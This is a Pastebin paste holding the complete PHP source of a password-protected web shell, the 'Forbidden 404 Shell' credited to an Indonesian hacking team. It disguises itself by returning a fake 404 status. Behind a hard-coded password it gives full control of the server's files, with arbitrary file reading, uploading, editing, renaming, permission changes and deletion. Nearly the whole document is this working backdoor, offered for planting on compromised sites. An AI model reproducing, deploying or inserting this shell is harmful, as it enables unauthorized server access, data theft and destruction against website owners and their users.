SHARE
TWEET

Untitled

a guest Aug 23rd, 2019 95 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2.  
  3. // Forbidden 404 Shell | Indonesia Silent Coders
  4. // Recorde ? Lumpuh Total + Bisu :v
  5.  
  6. error_reporting(0);
  7. header('HTTP/1.0 404 Not Found', true, 404);
  8. session_start();
  9. $pass = "makkaugeming";
  10. $link = "fvck.txt";
  11. if($_POST['password'] == $pass) {
  12.   $_SESSION['forbidden'] = $pass;
  13.   echo "<script>window.location='?403Forbidden'</script>";
  14. }
  15. if($_GET['page'] == "blank") {
  16.   echo "<a href='?'>Back</a>";
  17.   exit();
  18. }
  19. if(isset($_REQUEST['logout'])) {
  20.   session_destroy();
  21.   echo "<script>window.location='?403Forbidden'</script>";
  22. }
  23. if(!($_SESSION['forbidden'])) {
  24. ?>
  25. <title>404 Forbidden Shell</title>
  26. <link rel="icon" href="https://www.upload.ee/image/9815132/1554597359728-picsay.png">
  27. <style>
  28.   html{
  29.     overflow: auto;
  30.     background: black;
  31.     color: white;
  32.     font-family: "Courier New";
  33.   }
  34.   input {
  35.     background: transparent;
  36.     color: white;
  37.     height: 25px;
  38.     border: 1px solid white;
  39.     border-radius: 10px;
  40.     padding: 3px;
  41.     font-size: 15px;
  42.   }
  43.   .img {
  44.     width: 150px;
  45.     border: 1px solid white;
  46.     border-radius: 10px;
  47.   }
  48. </style>
  49. <table width="100%" height="100%">
  50. <form enctype="multipart/form-data" method="post">
  51.   <td align="center">
  52.      <img src="https://www.upload.ee/image/10374536/156623021-picsay.png" alt="Forbidden" width="700" height="300">
  53.           <br>      
  54.       <input type="password" name="password" placeholder="Fucking Your Self">
  55.       <input type="submit" value="LOGIN">
  56.  
  57. <h1><font class="Skranji" style="color:white;font-family:'Iceland';font-size: 15px;">Copyright &copy; 2019<font color="red"> Indonesia Silent Coders<font color="white"> | TEAM</h1>
  58.       <br>
  59.       <?php echo $_SESSION['forbidden']; ?>
  60.     </form>
  61.   </td>
  62. </table>
  63. <?php
  64. exit();
  65. }
  66. ?>
  67. <?php
  68. error_reporting(0);
  69. set_time_limit(0);
  70.  
  71. if(get_magic_quotes_gpc()){
  72. foreach($_POST as $key=>$value){
  73. $_POST[$key] = stripslashes($value);
  74. }
  75. }
  76. echo '<!DOCTYPE HTML>
  77. <html>
  78. <head>
  79. <link rel="icon" type="image/gif" href="https://www.upload.ee/image/9815132/1554597359728-picsay.png"><br>
  80. <link href="" rel="stylesheet" type="text/css">
  81. <title>403 Forbidden Shell</title>
  82. <center><img src="https://www.upload.ee/image/10374536/156623021-picsay.png" alt="Forbidden" width="600" height="230"> </center>
  83. <style>
  84. body{
  85. font-family: "Tahoma";background-image:url(https://media0.giphy.com/media/VXhUTVzvNmlRm/giphy.gif); background-size:cover; background-attachment: fixed;
  86.  
  87. color:red;
  88. }
  89. #content tr:hover{
  90. background-color: #2b282b;
  91. text-shadow:0px 0px 10px #ffffff;
  92. }
  93.  
  94. #content .first{
  95. background-color: #191919;
  96. }
  97. table{
  98. border: 1px #191919 dotted;
  99. }
  100. a{
  101. color:white;
  102. text-decoration: none;
  103. }
  104. a:hover{
  105. color:white;
  106. text-shadow:0px 0px 10px #FFFFFF;
  107. }
  108. input,select,textarea{
  109. border: 3px #FFFFFF solid;
  110. -moz-border-radius: 10px;
  111. -webkit-border-radius: 10px;
  112. border-radius: 6px;
  113. }
  114. </style>
  115. </head>
  116. <body>
  117. <table width="700" border="5" cellpadding="5" cellspacing="5" align="center">
  118. <tr><td><font color="lime">Your Path :</font> ';
  119. if(isset($_GET['path'])){
  120. $path = $_GET['path'];
  121. }else{
  122. $path = getcwd();
  123. }
  124. $path = str_replace('\\','/',$path);
  125. $paths = explode('/',$path);
  126.  
  127. foreach($paths as $id=>$pat){
  128. if($pat == '' && $id == 0){
  129. $a = true;
  130. echo '<a href="?path=/">/</a>';
  131. continue;
  132. }
  133. if($pat == '') continue;
  134. echo '<a href="?path=';
  135. for($i=0;$i<=$id;$i++){
  136. echo "$paths[$i]";
  137. if($i != $id) echo "/";
  138. }
  139. echo '">'.$pat.'</a>/';
  140. }
  141. echo '</td></tr><tr><td>';
  142. if(isset($_FILES['file'])){
  143. if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
  144. echo '<font color="lime">Berhasil Terupload </font><br />';
  145. }else{
  146. echo '<font color="red">Upload Gagal </font><br/>';
  147. }
  148. }
  149. echo '<form enctype="multipart/form-data" method="POST">
  150. <font color="lime">Select Your File :</font> <input type="file" name="file" />
  151. <input type="submit" value="Upload" />
  152. </form>
  153. </td></tr>';
  154. if(isset($_GET['filesrc'])){
  155. echo "<tr><td>Current File : ";
  156. echo $_GET['filesrc'];
  157. echo '</tr></td></table><br />';
  158. echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
  159. }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
  160. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
  161. if($_POST['opt'] == 'chmod'){
  162. if(isset($_POST['perm'])){
  163. if(chmod($_POST['path'],$_POST['perm'])){
  164. echo '<font color="lime">Change Permission Berhasil </font><br/>';
  165. }else{
  166. echo '<font color="red">Change Permission Gagal </font><br />';
  167. }
  168. }
  169. echo '<form method="POST">
  170. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
  171. <input type="hidden" name="path" value="'.$_POST['path'].'">
  172. <input type="hidden" name="opt" value="chmod">
  173. <input type="submit" value="Go" />
  174. </form>';
  175. }elseif($_POST['opt'] == 'rename'){
  176. if(isset($_POST['newname'])){
  177. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
  178. echo '<font color="lime">Ganti Nama Berhasil </font><br/>';
  179. }else{
  180. echo '<font color="red">Ganti Nama Gagal </font><br />';
  181. }
  182. $_POST['name'] = $_POST['newname'];
  183. }
  184. echo '<form method="POST">
  185. New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
  186. <input type="hidden" name="path" value="'.$_POST['path'].'">
  187. <input type="hidden" name="opt" value="rename">
  188. <input type="submit" value="Go" />
  189. </form>';
  190. }elseif($_POST['opt'] == 'edit'){
  191. if(isset($_POST['src'])){
  192. $fp = fopen($_POST['path'],'w');
  193. if(fwrite($fp,$_POST['src'])){
  194. echo '<font color="lime">Berhasil Edit File </font><br/>';
  195. }else{
  196. echo '<font color="red">Gagal Edit File </font><br/>';
  197. }
  198. fclose($fp);
  199. }
  200. echo '<form method="POST">
  201. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
  202. <input type="hidden" name="path" value="'.$_POST['path'].'">
  203. <input type="hidden" name="opt" value="edit">
  204. <input type="submit" value="Save" />
  205. </form>';
  206. }
  207. echo '</center>';
  208. }else{
  209. echo '</table><br/><center>';
  210. if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
  211. if($_POST['type'] == 'dir'){
  212. if(rmdir($_POST['path'])){
  213. echo '<font color="lime">Directory Terhapus</font><br/>';
  214. }else{
  215. echo '<font color="red">Directory Gagal Terhapus                                                                                                                                                                                                                                                                                             </font><br/>';
  216. }
  217. }elseif($_POST['type'] == 'file'){
  218. if(unlink($_POST['path'])){
  219. echo '<font color="lime">File Terhapus</font><br/>';
  220. }else{
  221. echo '<font color="red">File Gagal Terhapus</font><br/>';
  222. }
  223. }
  224. }
  225. echo '</center>';
  226. $scandir = scandir($path);
  227. echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
  228. <tr class="first">
  229. <td><center>Name</peller></center></td>
  230. <td><center>Size</peller></center></td>
  231. <td><center>Permission</peller></center></td>
  232. <td><center>Modify</peller></center></td>
  233. </tr>';
  234.  
  235. foreach($scandir as $dir){
  236. if(!is_dir($path.'/'.$dir) || $dir == '.' || $dir == '..') continue;
  237. echo '<tr>
  238. <td><a href="?path='.$path.'/'.$dir.'">'.$dir.'</a></td>
  239. <td><center>--</center></td>
  240. <td><center>';
  241. if(is_writable($path.'/'.$dir)) echo '<font color="lime">';
  242. elseif(!is_readable($path.'/'.$dir)) echo '<font color="red">';
  243. echo perms($path.'/'.$dir);
  244. if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir)) echo '</font>';
  245.  
  246. echo '</center></td>
  247. <td><center><form method="POST" action="?option&path='.$path.'">
  248. <select name="opt">
  249. <option value="">Select</option>
  250. <option value="delete">Delete</option>
  251. <option value="chmod">Chmod</option>
  252. <option value="rename">Rename</option>
  253. </select>
  254. <input type="hidden" name="type" value="dir">
  255. <input type="hidden" name="name" value="'.$dir.'">
  256. <input type="hidden" name="path" value="'.$path.'/'.$dir.'">
  257. <input type="submit" value=">">
  258. </form></center></td>
  259. </tr>';
  260. }
  261. echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
  262. foreach($scandir as $file){
  263. if(!is_file($path.'/'.$file)) continue;
  264. $size = filesize($path.'/'.$file)/1024;
  265. $size = round($size,3);
  266. if($size >= 1024){
  267. $size = round($size/1024,2).' MB';
  268. }else{
  269. $size = $size.' KB';
  270. }
  271.  
  272. echo '<tr>
  273. <td><a href="?filesrc='.$path.'/'.$file.'&path='.$path.'">'.$file.'</a></td>
  274. <td><center>'.$size.'</center></td>
  275. <td><center>';
  276. if(is_writable($path.'/'.$file)) echo '<font color="lime">';
  277. elseif(!is_readable($path.'/'.$file)) echo '<font color="white">';
  278. echo perms($path.'/'.$file);
  279. if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo '</font>';
  280. echo '</center></td>
  281. <td><center><form method="POST" action="?option&path='.$path.'">
  282. <select name="opt">
  283. <option value="">Select</option>
  284. <option value="delete">Delete</option>
  285. <option value="chmod">Chmod</option>
  286. <option value="rename">Rename</option>
  287. <option value="edit">Edit</option>
  288. </select>
  289. <input type="hidden" name="type" value="file">
  290. <input type="hidden" name="name" value="'.$file.'">
  291. <input type="hidden" name="path" value="'.$path.'/'.$file.'">
  292. <input type="submit" value=">">
  293. </form></center></td>
  294. </tr>';
  295. }
  296. echo '</table>
  297. </div>';
  298. }
  299. echo '<font color="white" size="2px"><center><br/><b>Copyright &copy; 2019 Indonesia Silent Coders | Team <br><font color="red">Recoded By ./Asano</a></center></font>
  300.  
  301. </body>
  302. </html>
  303. ';
  304. function perms($file){
  305. $perms = fileperms($file);
  306.  
  307. if (($perms & 0xC000) == 0xC000) {
  308. // Socket
  309. $info = 's';
  310. } elseif (($perms & 0xA000) == 0xA000) {
  311. // Symbolic Link
  312. $info = 'l';
  313. } elseif (($perms & 0x8000) == 0x8000) {
  314. // Regular
  315. $info = '-';
  316. } elseif (($perms & 0x6000) == 0x6000) {
  317. // Block special
  318. $info = 'b';
  319. } elseif (($perms & 0x4000) == 0x4000) {
  320. // Directory
  321. $info = 'd';
  322. } elseif (($perms & 0x2000) == 0x2000) {
  323. // Character special
  324. $info = 'c';
  325. } elseif (($perms & 0x1000) == 0x1000) {
  326. // FIFO pipe
  327. $info = 'p';
  328. } else {
  329. // Unknown
  330. $info = 'u';
  331. }
  332.  
  333. // Owner
  334. $info .= (($perms & 0x0100) ? 'r' : '-');
  335. $info .= (($perms & 0x0080) ? 'w' : '-');
  336. $info .= (($perms & 0x0040) ?
  337. (($perms & 0x0800) ? 's' : 'x' ) :
  338. (($perms & 0x0800) ? 'S' : '-'));
  339.  
  340. // Group
  341. $info .= (($perms & 0x0020) ? 'r' : '-');
  342. $info .= (($perms & 0x0010) ? 'w' : '-');
  343. $info .= (($perms & 0x0008) ?
  344. (($perms & 0x0400) ? 's' : 'x' ) :
  345. (($perms & 0x0400) ? 'S' : '-'));
  346.  
  347. // World
  348. $info .= (($perms & 0x0004) ? 'r' : '-');
  349. $info .= (($perms & 0x0002) ? 'w' : '-');
  350. $info .= (($perms & 0x0001) ?
  351. (($perms & 0x0200) ? 't' : 'x' ) :
  352. (($perms & 0x0200) ? 'T' : '-'));
  353.  
  354. return $info;
  355. }
  356. ?>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top